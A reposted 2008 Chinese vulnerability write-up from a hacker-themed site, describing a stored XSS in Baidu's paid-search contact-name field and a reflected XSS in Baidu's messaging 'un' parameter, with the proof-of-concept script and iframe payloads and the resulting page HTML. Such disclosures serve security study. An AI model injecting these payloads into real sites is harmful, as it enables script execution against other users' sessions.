黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[组图]百度竞价排名多处XSS漏洞
        ★★★★★

百度竞价排名多处XSS漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-7-19 10:27:03

 

XSS 11: 百度竞价排名联系人Stored XSS
登录竞价排名后,修改个人设定,将联系人姓名改为:

以下是引用片段:
<script>alert();</script>


保存

然后在登录首页,将执行脚本

代码如下:

以下是引用片段:
<table border=0 cellpadding=0 cellspacing=0 width=800>
<tr><td colspan=3><h3 align=center><br>欢迎访问百度竞价排名客户管理系统</h3>
</td></tr></table>
<table align=center width=800 class=h4_center>
<tr><td height=30 align=center>尊敬的用户 <script>alert(/联系人姓名/);</script>XSShere,您好!
<input type=”hidden” name=”servermode” id=”servermode” value=”">
这是一个持久类型的XSS,也就是说,会存储在服务器端。

昨天,在幻影的邮件列表里,有一个叫royalwhy的朋友,在回复我的邮件里,也发了一个他发现的XSS。
经过他的同意后,我将其也贴在这里。

XSS 12:百度发送消息XSS (发现者:royalwhy)
漏洞如下:

以下是引用片段:
http://msg.baidu.com/ms?ct=21&cm=1&tn=bmSendMessage&un=<iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/>



un参数后可以执行任意脚本,代码如下:
以下是引用片段:
<form name=”f” method=post action=”http://msg.baidu.com/” autocomplete = “off”>
<input type=hidden name=ct value=”22″>
<input type=hidden name=cm value=”MailSend”>
<input type=hidden name=tn value=”bmspsubmit”>
<input type=hidden name=lu value=”">
<input type=hidden name=vcode value=”">
<tr >
<td align=”right”>发送至:</td>
<td><input type=hidden name=sn value=”<iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/>”><iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/></td>
</tr>


百度的问题还有很多很多,今天只是举例来讲一个子系统。

这个系列写到这里,也没什么更大的动力再写下去了,我不喜欢做重复的劳动,所以明天将是最后一天,让我们结束这一切。而我也将有精力来阐述一些其他方面的问题和观点。

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体:
    中介交易区
    最 新 热 门
    实例讲解跨站入侵攻防战之攻击篇05-08
    对偶偶娱乐分站服务器的安全检测04-23
    入侵88red系统的详细过程04-07
    对趋势科技等数万网站被攻击的分03-21
    凡人网络购物系统 V8.0 简体中文03-18
    linux平台下渗透日本著名XXXXXX.03-18
    搜索框所引起的XSS漏洞03-05
    跳转漏洞的利用03-05
    对复旦大学的一次漫长渗透03-03
    .net一句话马以及dx论坛拿shell03-01
    php渗透入侵过程图文详解03-01
    DJ网站的入侵详细过程02-26
    相 关 文 章
    多款RSS阅读器出现XSS漏洞
    用百度空间钓鱼(挂马)的新方式
    XSS中再插JS
    百度跨站漏洞谢幕篇
    百度多处XSS跨站漏洞续篇
    百度空间多处XSS漏洞续篇
    百度空间多处DOM XSS漏洞
    The Week of Baidu Bugs - Day 03: 百度
    百度的JS数据流注入型跨站
    百度贴吧标题XSS漏洞
    Google 的 XSS 检测工具:Ratproxy
    关于XSS漏洞另一个攻击趋势
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886